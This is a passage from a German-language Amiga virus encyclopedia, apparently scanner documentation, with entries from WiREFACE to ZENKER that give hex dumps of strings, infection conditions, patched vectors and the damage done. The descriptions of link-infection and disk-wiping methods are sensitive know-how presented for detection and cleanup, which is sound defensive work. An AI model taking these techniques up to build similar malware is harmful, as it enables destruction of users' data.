  7370.              neue Files                      ?? Bytes
  7371.              bekannter Filename:
  7372.               - MakeKey                  9088 Bytes
  7373.            - Typ B
  7374.              Trojanteil allein 2 Hunks     5944 Bytes
  7375.              neue Files                      99 Bytes
  7376.              bekannter Filename:
  7377.               - ScanLink                 8040 Bytes
  7378.            - Typ C
  7379.              Trojanteil allein 2 Hunks     1880 Bytes
  7380.              neue Files                      97 Bytes
  7381.              bekannte Filenamen:
  7382.               - VirusChecker V6.60      52400 Bytes
  7383.               - HDToolBox V40.9        106508 Bytes
  7384.               - LZX1.20Turbo            83660 Bytes  
  7385.            - Typ D
  7386.              Trojanteil allein 2 Hunks     7108 Bytes
  7387.              neue Files                     469 und 0 Bytes
  7388.              bekannter Filename:
  7389.               - AECrack                  7924 Bytes   
  7390.            - Typ E
  7391.              Trojanteil allein 2 Hunks      588 Bytes
  7392.              neue Files                      64 und 0 Bytes
  7393.              bekannte Filenamen:   
  7394.               - DarkroomIntro           32344 Bytes
  7395.               - SetBufVirus              1096 Bytes   
  7396.            - Typ F
  7397.              zerstoert Rigid-Bereich
  7398.              bekannter Filename:   
  7399.               - CheckMount               4672 Bytes
  7400.  
  7401.    - WiREFACE-Trojan   File  (format sys:)
  7402.         Typ A:
  7403.         Laenge: 9088 Bytes
  7404.         Filename: MakeKey  (fuer Virus_Checker)
  7405.         VT bietet Loeschen an.
  7406.         Verwendet wurde die 4EB9-Methode. Der erste Link wurde gepackt.
  7407.         Im entpackten Link koennen Sie lesen:
  7408.            57695245 46414345 202f2064 454d4f4e WiREFACE / dEMON
  7409.            53206f46 20744845 2070454e 54414752 S oF tHE pENTAGR
  7410.            414d202a 20574869 50504544 20594f55 AM * WHiPPED YOU
  7411.            52204844 2c205355 4b4b4148 20212120 R HD, SUKKAH !!
  7412.            5765204c 6f6f6b20 446f776e 20596f75 We Look Down You
  7413.            72204e6f 73652028 4c617567 68746572 r Nose (Laughter
  7414.            29210a00 7379733a 00007379 733a0000 )!..sys:..sys:..
  7415.            536e7570 70210000 7379733a 00007379 Snupp!..sys:..sy
  7416.            733a7072 75707025 64007379 733a6261 s:prupp%d.sys:ba
  7417.            6a732564 00007379 733a6b69 73732564 js%d..sys:kiss%d
  7418.            00007379 733a706f 74746125 64007379 ..sys:potta%d.sy
  7419.            733a0000 7379733a 0000536e 75707021 s:..sys:..Snupp!
  7420.         Ablauf:
  7421.         - sys: wird schnell formatiert mit dem Namen Snupp!
  7422.         - Danach sollen neue Files mit Zahlen (teilweise bis 1000)
  7423.           geoeffnet werden (also z.B. prupp46 usw.).
  7424.           Wenn Sie jetzt einen SystemRequester sehen, haben Sie "Glueck".
  7425.           Der Programmierer hat eine "Kleinigkeit" uebersehen. Ver-
  7426.           suchen Sie mit Disksalv eine Rettung.
  7427.         - Falls die Files angelegt werden (bei mir NICHT), duerfte
  7428.           die Partition verloren sein.
  7429.           Falls die Files angelegt wurden, erfolgt danach
  7430.           (hab "einfach" die Requester weggeklickt)
  7431.         - ein Schreiben nach Block 0  Inhalt $feeffeef  Folge: NoDos
  7432.            0000: feeffeef 00000000 00000000 00000000 ................
  7433.            0010: 00000000 00000000 00000000 00000000 ................
  7434.         - und eine Endlos-Textausgabe ( WiREFACE...(Laughter)! ) im
  7435.           Cli . Es hilft nur ein Tastatur-Reset
  7436.         Typ B:
  7437.         Laenge: 8040 Bytes
  7438.         Filename: ScanLink  (testet angeblich auf Linkviren)
  7439.         VT bietet Loeschen an.
  7440.         Verwendet wurde die 4EB9-Methode. Der erste Link wurde gepackt.
  7441.         Im entpackten Link koennen Sie lesen: 
  7442.                                       57695245             WiRE
  7443.            46414345 202f2064 454d4f4e 53206f46 FACE / dEMONS oF
  7444.            20744845 2070454e 54414752 414d202a  tHE pENTAGRAM *
  7445.            20574869 50504544 20594f55 52204844  WHiPPED YOUR HD
  7446.            2c205355 4b4b4148 20212120 5765204c , SUKKAH !! We L
  7447.            6f6f6b20 446f776e 20596f75 72204e6f ook Down Your No
  7448.            73652028 4c617567 68746572 29210a00 se (Laughter)!..
  7449.            7379733a 00007379 733a0000 57695245 sys:..sys:..WiRE
  7450.            46414345 00007379 733a0000 57695245 FACE..sys:..WiRE
  7451.            46414345 3a707275 70702564 00005769 FACE:prupp%d..Wi
  7452.            52454641 43453a62 616a7325 64005769 REFACE:bajs%d.Wi
  7453.            52454641 43453a47 4f442753 2041524d REFACE:GOD'S ARM
  7454.            59202d20 444f5020 2d202564 00005769 Y - DOP - %d..Wi
  7455.            52454641 43453a70 6f747461 25640000 REFACE:potta%d..
  7456.            57695245 46414345 3a005769 52454641 WiREFACE:.WiREFA
  7457.            43453a00 536e7570 70210000 6468313a CE:.Snupp!..dh1:
  7458.            00006468 313a0000 506c7570 70210000 ..dh1:..Plupp!..
  7459.            6468303a 00006468 303a0000 466c7570 dh0:..dh0:..Flup
  7460.            70210000                            p!..
  7461.         Bei Typ B sind also dh0: und dh1: dazugekommen. Leider wurde
  7462.         auch der Fehler nach der Format-Routine gefunden. Die Fuell-
  7463.         Files werden jetzt wirklich angelegt.
  7464.         Beispiel:
  7465.            prupp98        Laenge: 99
  7466.            57695245 46414345 202f2064 454d4f4e WiREFACE / dEMON
  7467.            53206f46 20744845 2070454e 54414752 S oF tHE pENTAGR
  7468.            414d202a 20574869 50504544 20594f55 AM * WHiPPED YOU
  7469.            52204844 2c205355 4b4b4148 20212120 R HD, SUKKAH !!
  7470.            5765204c 6f6f6b20 446f776e 20596f75 We Look Down You
  7471.            72204e6f 73652028 4c617567 68746572 r Nose (Laughter
  7472.            29210a                              )!.
  7473.         Die Laenge der Fuellfiles aendert sich (z.B. bajs0 ueber 200000).
  7474.         Sie enthalten dann den Text (s.o.) und Speichermuell.
  7475.         Wenn Sie also nicht sehr schnell reagieren, ist auch mit Disk-
  7476.         salv nichts mehr zu retten.
  7477.         Das erste bearbeitete Laufwerk (sys:) heisst jetzt WiREFACE.
  7478.         Typ C:
  7479.         Anderer moeglicher Name: Alfons-Eberg-2.0-Trojan  siehe in Dump
  7480.         Zerstoerung HD0: mit 68040 gelungen.
  7481.         Bekannte Filenamen:
  7482.          - VirusChecker V6.60  Laenge: 52400 Bytes
  7483.          - HDToolBox V40.9     Laenge: 106508 Bytes
  7484.          - LZX1.20Turbo        Laenge: 83660 Bytes
  7485.         VT bietet nur Loeschen an, da die Programme in DER Versions-
  7486.         nummer im Juli 95 NICHT existieren.
  7487.         Verwendet wurde die 4EB9-Methode. Zusaetzlich wurde beim HDTOOL-
  7488.         Box-File noch ein 3E8-*Art-Hunk davorgelinkt.
  7489.         Betroffene Medien sollen jetzt sein:
  7490.         BBS, DH0, DH1, DH2, DH3, DH4, DH5, D0H0, SYS und NCOMM
  7491.            CP17           Laenge: 97 Bytes
  7492.            414c464f 4e5320c5 42455247 20566952 ALFONS .BERG ViR
  7493.            55532076 322e3020 df657461 20627920 US v2.0 .eta by
  7494.            57695245 46414345 202f2064 454d4f4e WiREFACE / dEMON
  7495.            53206f46 20744845 2070454e 54414752 S oF tHE pENTAGR
  7496.            414d2c20 64656469 63617465 6420746f AM, dedicated to
  7497.            2028436f 726e2946 6c616b65 2f545253  (Corn)Flake/TRS
  7498.            49                                  I
  7499.         Die Laenge der Fuellfiles aendert sich (z.B. harharhar 100000).
  7500.         Sie enthalten dann den Text (s.o.) und Speichermuell.
  7501.         Wenn Sie also nicht sehr schnell reagieren, ist auch mit Disk-
  7502.         salv nichts mehr zu retten.
  7503.         Typ D:
  7504.         Filename: AECrack
  7505.         Laenge: 7924 Bytes
  7506.         Nach FileID: CRACK AMIEXPRESS PASSWORDS
  7507.         VT bietet nur Loeschen an.
  7508.         Am Anfang haengt ein 3E8-*ART-Hunk
  7509.         Nach dem Entpacken erkennt man, dass mit der 4EB9-Methode zwei
  7510.         GLEICHE wieder gepackte Teile zusammengelinkt wurden.
  7511.         Im entpackten Teil ist zu lesen:  
  7512.                                       00002d21 p.L.@.Nu%s%s..-!
  7513.            2d576952 45464143 452d212d 00005359 -WiREFACE-!-..SY
  7514.            533a0000 5359533a 2d212d57 69524546 S:..SYS:-!-WiREF
  7515.            4143452d 212d0000 4448303a 00004448 ACE-!-..DH0:..DH
  7516.            303a2d21 2d576952 45464143 45206445 0:-!-WiREFACE dE
  7517.            4d4f4e2d 212d0000 4242533a 00004242 MON-!-..BBS:..BB
  7518.            533a2d21 2d64454d 4f4e2057 69524546 S:-!-dEMON WiREF
  7519.            4143452d 212d0000 4448313a 00004448 ACE-!-..DH1:..DH
  7520.            313a2d21 2d576952 45464143 45207045 1:-!-WiREFACE pE
  7521.            4e544147 52414d2d 212d0000          NTAGRAM-!-..
  7522.         Ablauf:
  7523.          Die Format-Routine ist weggefallen.
  7524.          Betroffene Medien: SYS:, DH0:, BBS: und DH1: (s.o.)
  7525.          Es wird ein File (Laenge: 469, Name bei SYS: -!-WiREFACE-!-)
  7526.          angelegt. Inhalt:
  7527.            WiREFACE / dEMONS oF THE PENTAGRAM presents... (tadaa)
  7528.            'KLiA MiG PÅ NUPPEN' TROjAN (SUPER BETA RELEASE(BETA BETA CODE))
  7529.            usw.
  7530.          ALLE anderen Files des Laufwerks werden auf die Laenge 0 gesetzt.
  7531.          Am Schluss wird im cli in einer Endlosschleife der Text, der auch
  7532.          ins File geschrieben wird, ausgegeben.
  7533.         Typ E:
  7534.         Filename:DarkroomIntro
  7535.         Laenge: 32344 Bytes
  7536.         oder
  7537.         Filename: SetBufVirus
  7538.         Laenge:  1096 Bytes   (gepackt aber nicht gelinkt ???)
  7539.         VT bietet nur loeschen an.
  7540.         Mit der 4EB9-Methode wurde ein Trojanteil und ein Intro von 1994
  7541.         zusammengelinkt. Beide Teile sind gepackt:
  7542.         Im entpackten 1.Link ist zu lesen:
  7543.                                           733a               s:
  7544.            00006465 76733a00 6c696273 3a006c3a ..devs:.libs:.l:
  7545.            0000256c 7364454d 4f4e5320 6f462074 ..%lsdEMONS oF t
  7546.            48452070 454e5441 4752414d 21002a2a HE pENTAGRAM!.**
  7547.            2aae3043 6b276e27 ae304c4c 2054ae30 *.0Ck'n'.0LL T.0
  7548.            6a414e2a 2a2a2062 79205769 52454641 jAN*** by WiREFA
  7549.            4345202f 20644f50 21202d54 6f204845 CE / dOP! -To HE
  7550.            4c4c2057 69746820 7961276c 6c210000 LL With ya'll!..
  7551.         Ablauf:
  7552.          Betroffene Verzeichnisse: s, devs, libs, l
  7553.          In diese Verzeichnisse wird ein 64 Bytes langes File mit dem
  7554.          Namen dEMONS oF tHE pENTAGRAM! geschrieben. Textinhalt:
  7555.          ***... usw. s.o.
  7556.          Die restlichen Files in den Verzeichnissen werden auf die
  7557.          Laenge 0 gesetzt.
  7558.         Typ F:
  7559.         Filename:CheckMount
  7560.         Laenge: 4672 Bytes
  7561.         Laut Dok: Mount-972 Virus Checker
  7562.         Vor dem gepackten File sitzt ein 3E8-*Art-Hunk.
  7563.         Im entpackten File ist zu lesen:
  7564.            00000000 73637369 2e646576 69636500 ....scsi.device.
  7565.            69636464 69736b2e 64657669 6365006f icddisk.device.o
  7566.            6b746167 6f6e2e64 65766963 6500536f ktagon.device.So
  7567.            66745343 53495f4f 6b746167 6f6e4339 ftSCSI_OktagonC9
  7568.            582e6465 76696365 00285472 6f6a616e X.device.(Trojan
  7569.            4e616d65 3a20694c 534b4e41 20414e44 Name: iLSKNA AND
  7570.            52454153 2076312e 31292057 69524546 REAS v1.1) WiREF
  7571.            41434520 2f206445 4d4f4e53 206f4620 ACE / dEMONS oF
  7572.            74484520 70454e54 41475241 4d207374 tHE pENTAGRAM st
  7573.             ;...
  7574.            210a0000 6e756767 65744064 61746170 !...nugget@datap
  7575.            686f6e65 2e73650a 0000436f 756c646e hone.se...Couldn
  7576.         Ablauf:
  7577.          Im cli wird immer wieder nugget@dataphone.se ausgegeben.
  7578.          Gleichzeitig wird nach bestimmmten devices (s.o.) gesucht.
  7579.         Schaden beim Test:
  7580.          Der Rigid-Bereich wurde mit Speichermuell vollgeschrieben.
  7581.          Danach stand der Rechner. Es waere keine schlechte Idee
  7582.          vom Rigid-Zylinder ein Backup zu haben (z.Zyl/backup).
  7583.          Mit z.Zyl/restore konnte die Festplatte ohne Verlust
  7584.          reaktiviert werden. Vorher musste selbst in der hdtoolbox
  7585.          der Festplattentyp festgelegt werden.
  7586.        Hinweis 09.09.96:
  7587.          Ein AntiVirusPrg. erkennt im Moment in dem File mit dem
  7588.          Namen INTRO.EXE  (L:74036) ein Wireface-Teil. Es handelt
  7589.          sich hierbei um eine FEHLERKENNUNG !!!! Fehler wurde im
  7590.          Fruehjahr 1998 erkannt und von dem neuen Programmierer des
  7591.          Antivirusprogramms behoben.
  7592.  
  7593.    - WIREFIRE-Trojan   gegen BBS
  7594.         Filename: Comkiller1.6
  7595.         Laenge: 4604 Bytes
  7596.         Nach FileID: Command Virus Killer/Scanner V1.6
  7597.         In Wirklichkeit sind mit der 4EB9-Methode zwei Teile zusammenge-
  7598.         linkt.
  7599.         VT bietet nur Loeschen an, da ich ein Version 1.6 nicht kenne.
  7600.         Im entpackten 1. Link ist zu lesen:
  7601.            68696869 68690057 49524546 49524500 hihihi.WIREFIRE.
  7602.            6262733a 00626273 00626273 00ff0053 bbs:.bbs.bbs...S
  7603.               ;....
  7604.            3a746573 742e6461 74610062 62733a6e :test.data.bbs:n
  7605.            6f646534 2f706c61 7970656e 2f707374 ode4/playpen/pst
  7606.            2d666f72 2e747874 00626273 3a6e6f64 -for.txt.bbs:nod
  7607.               ;usw.
  7608.         Soll user.data auslesen und ablegen.
  7609.         Fuer User ohne Mailbox kaum Gefahr.
  7610.  
  7611.  
  7612.    - X-Fucker-Virus   File   Link- UND Zerstoerungsroutine
  7613.          Verbogene Vektoren: Open und LoadSeg
  7614.          Nicht Resetfest
  7615.          Duerfte mit KS1.3 Probleme haben.
  7616.          Verlaengert ein File um 828 Bytes.
  7617.          Zu Beginn eines verseuchten Files ist zu lesen:
  7618.            0000: 000003f3 00000000 00000001 00000000 ................
  7619.            0010: 00000000 00000411 000003f1 00000003 ................
  7620.            0020: 2f582046 75636b65 72000000 000003e9 /X Fucker.......
  7621.          Also ein 3F1-Hunk !!!!!!!!!!!!
  7622.          Schreibt Z nach $0, um zu erkennen, dass das Teil schon im
  7623.          Speicher ist.
  7624.          Schaeden:
  7625.          Bei Open:
  7626.          Test auf Systemzeit mind. 21.Feb.95
  7627.          Falls nein: Original-Open
  7628.          Test auf BBS: im Pfad      (also nur gegen BBS)
  7629.          Falls nein: Original-Open
  7630.          Es wird Mode NewFile gesetzt. Dies soll das Loeschen des Files
  7631.          im BBS-Bereich bewirken.
  7632.          Bei LoadSeg:
  7633.          KEIN Test auf BBS (also kann jeder betroffen sein)
  7634.          Test auf File hat nur 1 Hunk
  7635.          Falls nein: Original-LoadSeg
  7636.          Test auf 3F1-Hunk
  7637.          Falls ja: Original-LoadSeg
  7638.          Damit soll ein Mehrfachbefall vermieden werden.
  7639.          Ablauf:
  7640.          Es wird vorne ein 3F1-Hunk angehaengt. Laenge 20 Bytes
  7641.          Danach wird zu Beginn des ersten Hunks das eigentliche Virus-
  7642.          teil geschrieben. Laenge 808 Bytes
  7643.          Dann wird nach $3EC (reloc) gesucht. Falls nein: Ende der Ver-
  7644.          seuchung. Falls ja: Veraenderung von Reloc und im File. Ein
  7645.          echtes Abenteuer (Programmierer mit WENIG Ahnung).
  7646.          Bei Tests hat sich gezeigt, dass sehr viele Files defekt sind.
  7647.          z.B. $3F2 am Ende fehlt, falscher Umgang mit Chip-Hunk usw.
  7648.          Bei solchen Files verweigert VT den Ausbau und bietet nur
  7649.          Loeschen an. Bei "guten" Files versucht VT den Ausbau.
  7650.          VT sollte das Virusteil auch im Speicher erkennen.
  7651.  
  7652.  
  7653.    - XaCa-D.Killer    Disk-Killer Clone  s.o.
  7654.          Laenge PP-gepackt: 1440 Bytes
  7655.          Laenge ungepackt : 1368 Bytes
  7656.          Filename: disktest
  7657.          Jemand hat es wieder einmal geschafft, einen Text zu aendern.
  7658.          Tut mir leid, die Muehe war umsonst.
  7659.          Im entpackten File ist zu lesen:
  7660.            20205861 4361206c 756d6d69 6e205631   XaCa lummin V1
  7661.            2e352020 200a2020 20202020 20202020 .5   .
  7662.            20202020 20202020 20202020 20202020
  7663.            20202020 20200a43 41544348 204d4520       .CATCH ME
  7664.            49462059 4f552043 414e2120 47524820 IF YOU CAN! GRH
  7665.            usw.
  7666.       
  7667.    - xcom-Insta.      File  Installer
  7668.          Filename: version.library
  7669.          Laenge: #900 Bytes
  7670.          Im File ist zu lesen:
  7671.            7273696f 6e2e6c69 62726172 79007665 rsion.library.ve
  7672.            7273696f 6e203430 2e343320 2832332e rsion 40.43 (23.
  7673.            342e3934 290d0a00 0000002a 00000058 4.94)......*...X
  7674.          Diese Versionsnummer kenne ich nicht. Meine Original-version-
  7675.          .library ist nur #272 Bytes lang.
  7676.          VT bietet Loeschen an. Kopieren Sie danach von Ihrer
  7677.          Original-WB-Disk die version.library wieder auf.
  7678.          Das xcom-Teil ist hier codiert eingebaut, vermehrt sich
  7679.          dann aber uncodiert (siehe unten).
  7680.  
  7681.    - xcom-LVirus      File  Link
  7682.          vgl. auch HappyNewYear96
  7683.          ab KS2.04: ja   (Versionsabfrage auf mind. #37)
  7684.          Namensbegruendung:  im Linkteil ist uncodiert zu lesen:  
  7685.             f00ab240 6d047001 4e757000 4e757863 ...@m.p.Nup.Nuxc
  7686.             6f6d48e7                            omH.          ^^
  7687.              ;.....                             ^^
  7688.             0029646f 732e6c69 62726172 7900abcd .)dos.library...
  7689.                                        ^^^^^^^^
  7690.          Verbogener Vektor: LoadSeg
  7691.          Resetfest: Nein
  7692.          Fileverlaengerung: 576 Bytes
  7693.          Link hinter den ersten Hunk.
  7694.          Test ob LoadSeg schon verbogen
  7695.          Aktivierung in Abhaengigkeit von $DFF006 und $DFF00A (neu)
  7696.          VT versucht Loadseg im Speicher zurueckzusetzen.
  7697.          VT versucht den Linkteil aus einem File auszubauen.
  7698.          Vermehrungsbedingungen:
  7699.            - File ist noch nicht verseucht (1 LW-Test)
  7700.            - Filename enthaelt nicht ".l" oder "-"
  7701.            - max. Filelaenge #124000 Bytes
  7702.            - min. Filelaenge #2400 Bytes
  7703.            - 3E9-Hunk wird gefunden
  7704.            - Disk validated
  7705.            - mind. 4 Block frei
  7706.            - RTS wird gefunden  ( max. loop $3F )
  7707.            - RTS wird ersetzt durch bra.s oder NOP
  7708.          Ueberspringt 3E8,3F0,3F1-Hunks usw. !!!!!
  7709.          Das Teil meldet sich nicht.
  7710.          Hinweis:
  7711.          Falls Ihre HD sehr verseucht ist, dann beginnen Sie bitte mit
  7712.          dem C-Verz. (File-Speicher-File). Das haeufige Neueinlesen
  7713.          wird dadurch geringer.
  7714.  
  7715.  
  7716.    - XCOPY2-BB   eigentlich ein Anti-BB  sehen Sie deshalb unten
  7717.          Dort gehoert er eigentlich auch nicht hin, da er nicht nach
  7718.          Viren sucht, aber ich wollte den BB in diesem Dokument behal-
  7719.          ten und nicht nach "andere BB" auslagern
  7720.  
  7721.    - XCopyPro6.5-Trojan
  7722.          Erzeugt beim Starten von XCopyPro V6.5  (Laenge:28336)
  7723.          den BB  Little Sven
  7724.          Hinweis: im April 92 lag die OrigVersionsNr. von Xcopy erst
  7725.             bei 5.2x (glaub ich).
  7726.          Gefunden in: xcopy65e.lha  Laenge: 25360
  7727.          VT bietet Ausbau an.
  7728.  
  7729.    - XENO     Link-Virus, verlaengert das befallene Prg. um 1124 Bytes
  7730.          verbiegt DosOpen, DosLock und DosLoadSeg
  7731.          erhoeht Hunk-Zahl im File-Header nicht !!!
  7732.          testet vor Befall Filenamen auf 0-9, a-z und A-Z,
  7733.          Folge: Programme, deren Namen SonderZeichen enthalten, werden
  7734.          n i c h t  befallen.
  7735.          Ausserdem werden  a l l e  Prg., die im Unterverzeichnis
  7736.          l oder devs stehen, n i c h t  verseucht.
  7737.  
  7738.          Textausgabe (Output, Write) in Abhaengigkeit von $DFF006
  7739.          Text wird erst zur Ausgabe decodiert ( eori.b #-$80,(a0)+ ) :
  7740.             Greetings Amiga user from the Xeno virus!
  7741.          in einem verseuchten File ist in der Naehe von $460 mit einem
  7742.          Monitor zu sehen:
  7743.                l.devs.fastfilesystem.
  7744.  
  7745.    - XENO a    kleine Veraenderung um AntiVirusPrg.e zu taeuschen
  7746.          09.03.92
  7747.          Nachtrag 02.11.92: mehrere Xeno-links ans gleiche File sollten
  7748.          in einem Durchgang ausgebaut werden.
  7749.  
  7750.    - XENO-nichtlauff   File
  7751.          Kleine Veraenderung um AntiVirusPrg.e zu taeuschen.
  7752.          Aber der Zusammenhang zwischen Hunkanzahl und notwendigen Hunk-
  7753.          laengenangaben scheint nicht klar zu sein (Anfaenger).
  7754.          Das File ist NIE lauffaehig.
  7755.          Amiga-Dos meldet:  Error code 121
  7756.                             Bad loadfile hunk
  7757.          VT bietet loeschen an.
  7758.  
  7759.    - Xerox = DIGITAL AGE = Forpib-Clone
  7760.          nur Text geaendert
  7761.  
  7762.    - XLINK  V3.0  File
  7763.          VT glaubt ein File gefunden zu haben, das mit XLINK erzeugt
  7764.          wurde. Es handelt sich angeblich um ein Szenen-Programm, mit
  7765.          dem 2 ausfuehrbare Programm-Files zu 1 File zusammengelinkt
  7766.          werden koennen. Also geeignet fuer VirenProduktion !!!
  7767.          Muss aber NICHT immer negativ verwendet werden. VT sucht in
  7768.          dem File NICHT nach Viren-Mustern. Sie muessen selbst eine
  7769.          Entscheidung treffen.
  7770.          HINWEIS ab VT2.54 :
  7771.          Sie koennen jetzt im File-Requester Teil 1 oder 2 abschalten.
  7772.          Link1aus - schaltet den Programmteil 1 ab.
  7773.          Link2aus - schaltet den Programmteil 2 ab.
  7774.          Dies kann natuerlich nur ein NOTNAGEL sein. Besser ist es, wenn
  7775.          Sie mir das verseuchte Teil zuschicken und noch mehr erleichtern
  7776.          Sie mir meine Arbeit, falls Sie zufaellig das Programm auch im
  7777.          ungelinkten Zustand besitzen.
  7778.          Bitte fertigen Sie sich von dem gelinkten Programm zwei ver-
  7779.          schiedene Namenskopien auf einer sonst leeren Disk an. Schalten
  7780.          Sie danach an Kopie 1 den Link 1 ab und an Kopie 2 den Link 2 ab.
  7781.          Wenn Sie Glueck haben, ist ein lauffaehiges Programm dann ohne
  7782.          Virusteil oder ohne Intro !!
  7783.          Aber !!!  Es ist auch moeglich, dass das Haupt-Programm NICHT
  7784.          mehr laeuft. Warum ?  Beispiel:
  7785.          Eine Gruppe hat ein Intro vor ein Spiel gelinkt. Dann koennen
  7786.          in diesem Intro schon Veraenderungen am Computer (FastRam ab-
  7787.          schalten usw.) vorgenommen werden, die das Spiel voraussetzt.
  7788.          Ohne das Intro ist das Spiel dann logischerweise nicht lauf-
  7789.          faehig. MERKE: Ein so veraendertes File gibt man NICHT weiter!!!
  7790.  
  7791.    - XPRZSPEED-Virus   anderer Name: ZSPEED-Virus    s.u.
  7792.  
  7793.    - Xtruder3.5-Trojan    Zerstoerung
  7794.          Filelaenge: 183700 Bytes
  7795.          Notwendig: Xtruder.key   (als Faelschung)
  7796.                     (sonst nur bei "sehr unguenstigen" Bedingungen)
  7797.          Nicht Resetfest
  7798.          Verbogener Vektor: Keine
  7799.          Zerstoerung: Veraendert Filelaengen auf SYS:
  7800.          Empfehlung: Sofort Loeschen
  7801.          Im File ist zu lesen:
  7802.           4e004c3a 58747275 6465722e 6b657900 N.L:Xtruder.key.
  7803.           58747275 6465722e 6b657900 23352041 Xtruder.key.#5 A
  7804.           6c657820 486f6c73 7400533a 00005359 lex Holst.S:..SY
  7805.           533a5072 6566732f 456e762d 61726368 S:Prefs/Env-arch
  7806.           69766500 433a0000 5359533a 00006100 ive.C:..SYS:..a.
  7807.         Test: Ich stelle fest, dass ich WEDER ein Original-key.file NOCH
  7808.           ein FALSCHES key.file besitze. Es geht auch auf einem anderen
  7809.           Weg.
  7810.           Nach Xtruder3.5-Aufruf:
  7811.         Pfad  SDH0:
  7812.         VTFlush2
  7813.                  0
  7814.           FileL 0?
  7815.             ;.....
  7816.         l/Bootblock.brainfile
  7817.                  0
  7818.           FileL 0?
  7819.             ;.....
  7820.         c/AddBuffers
  7821.                  0
  7822.           FileL 0?
  7823.             ;.....
  7824.         libs/xtruder.library
  7825.                  0
  7826.           FileL 0?
  7827.             ;.....  
  7828.         devs/system-configuration
  7829.                  0
  7830.           FileL 0?
  7831.             ;.....
  7832.         Es wurden also alle Filelaengen (auch in SubDirs) auf 0 gesetzt.
  7833.  
  7834.         Stellungnahme des Programmierers im Netz:
  7835.           *** area : VIRUS_AMY                Date: 30 Jun 97 20:40:01
  7836.           *** from : Martin Wulffeld (39:141/124.53)
  7837.           *** to   : All
  7838.           *** about: Xtruder 3.5
  7839.           Hi
  7840.           As some of you may know Xtruder 3.5 has done a bit of damage
  7841.           to peoples files. However, it has only affected those people
  7842.           who used a fake keyfile and hopefully also the criminal
  7843.           B---- P------- (2:---/--) who still owes my friend Alex Holst
  7844.           somewhere around 7000 Dkr. I hope all you fucknuts learned a
  7845.           lesson. From v3.6 and forward I will remove this behaviour.
  7846.           Peace out!
  7847.           . martin . kozmiq . wulffeld@post4.tele.dk
  7848.           . see ya at roskilde'98
  7849.         Meine Anmerkung:
  7850.           Ich halte die Vorgehensweise fuer verantwortungslos und
  7851.           rechtlich SEHR bedenklich. Ich denke, der Programmierer
  7852.           hat sich und seinem Programm einen sehr grossen Baerendienst
  7853.           erwiesen. Das Vertrauen der User duerfte dahin sein.
  7854.         Nachtrag 97-07-09:
  7855.           Auszug aus Xtruder V3.6:
  7856.           4e004c3a 58747275 6465722e 6b657900 N.L:Xtruder.key.
  7857.           58747275 6465722e 6b657900 610001ac Xtruder.key.a...
  7858.           Es hat im AmyNet-Vir (nicht aminet) mehrere Rechtfertigungs-
  7859.           versuche des Programmierers gegeben. Anscheinend hat er seine
  7860.           Meinung geaendert und den Zerstoerungsteil aus V3.6 wieder
  7861.           entfernt. Ob er dadurch das Vertrauen zu sich und seinem
  7862.           Programm zurueckgewinnt, mag jeder User fuer sich selbst
  7863.           entscheiden. Es gibt ein Sprichwort: Wer einmal ....
  7864.         Nachtrag 97-07-27:
  7865.           Es tauchen in letzter Zeit immer wieder Meldungen in Amiga-Netzen
  7866.           auf, die falsche Xtruder-Versions-Nummern (z.B. 3.6) enthalten
  7867.           und auf Viruseigenschaften hinweisen. Diese Aussagen sind
  7868.           FALSCH !!!!!  Es handelt sich NICHT um ein Virus-Teil, sondern um
  7869.           ein Trojan-Teil, da KEINE Vermehrung stattfindet. Die Zerstoerungs-
  7870.           routine wurde NUR (!!!!) in V3.5 gefunden. In V3.4, V3.6 habe ich
  7871.           diese Routine NICHT gefunden !!!!!
  7872.  
  7873.  
  7874.    - YAMmsg.2-Trojan      Zerstoerung
  7875.         bekannter Filename: YAM.msg.2
  7876.         Namensbegruendung: Filename uebernommen
  7877.         Filelaenge:  #216296 Bytes
  7878.         Nicht Resetfest
  7879.         Keine verbogenen Vektoren
  7880.         Ablauf:
  7881.         Das Programm beendet sich bei mir mit einem Requester
  7882.         "Illegal Instruction"
  7883.         In Wirklichkeit wurde ein neues loadwb-File geschrieben.
  7884.         Name: lOAdwB  Laenge: 40544
  7885.         Im File ist zu lesen:
  7886.             45523a20 6c6f6164 77622033 392e3920 ER: loadwb 39.9
  7887.             2833302e 30332e39 3529266d 80102f0b (30.03.95)&m../.
  7888.         Dieses File enthaelt wieder zwei Files zum Schreiben UND
  7889.         ausfuehren:
  7890.          - Orig-Loadwb  Laenge: 1136 Bytes
  7891.          - Format       Laenge gepackt:  9312 Bytes
  7892.                         Laenge entpackt: 13368 Bytes
  7893.         VT bietet nur loeschen an.
  7894.  
  7895.    - Z.E.S.T  BB    LADS-Clone  s.o
  7896.          Aenderung: lesbarer Text, kein TaeuschAlert, verschluesselter
  7897.          Text ist gleich  (Anfaenger)
  7898.          lesbarer Text: Z.E.S.T is the B.E.S.T Virus-Killer usw.
  7899.  
  7900.    - ZACCESS V1.0    16Bit-Clone   s.o.
  7901.          nur Text geaendert
  7902.  
  7903.    - ZACCESS V2.0    Forpib-Clone  s.o.
  7904.          nur Text geaendert
  7905.  
  7906.    - ZACCESS V3.0    Extreme-Clone s.o.
  7907.          nur Text geaendert
  7908.  
  7909.    - ZAPA_B.Door   Filename DM-Trash
  7910.          Laenge gepackt:  4764   VT erkennt P-Packer
  7911.          Laenge entpackt: 7636   VT erkennt ZAPA
  7912.              gegen AmiExpress ???
  7913.          dm-tr.lha 5135 Bytes  entpackt: dm-trash 4764 Bytes
  7914.          folgender Text (doc) ist zur Taeuschung enthalten:
  7915.          New virus ...caused by the new FIXED (?) Version
  7916.          of DMS 1.11 Turbo!
  7917.          It is some kind of linkvirus and uses Devices
  7918.          like DH0:, LIBS:, and BBS: (!!) usw.
  7919.  
  7920.          Eigene Versuche mit FangFiles (habe AmiExpress nicht) haben
  7921.          ergeben, dass eben von dm-trash folgende Files veraendert wer-
  7922.          den:  bbs:config1  bbs:user.data  bbs:user.key 
  7923.          Die Files wurden verlaengert und ZAPA eingetragen.
  7924.          dm-trash. Vermutlich soll ein Superlevel fuer einen Boxzu-
  7925.          gang geschaffen werden. Also fuer normale Amiga-User kein
  7926.          Problem.
  7927.          VT bietet loeschen an.
  7928.  
  7929.    - ZENKER-Virus   BB  KS2.04: ja  im Speicher immer ab $7F800
  7930.          Cool $7F86c DoIo $7F894
  7931.          Fordert trackdisk.device NICHT
  7932.          Versucht im BB durch lesbaren Text zu taeuschen:
  7933.               Commodore Bootloader (20 Oct 1987)
  7934.          Dieser BB holt in Wirklichkeit ab $70000 auf Speichermedium (bei
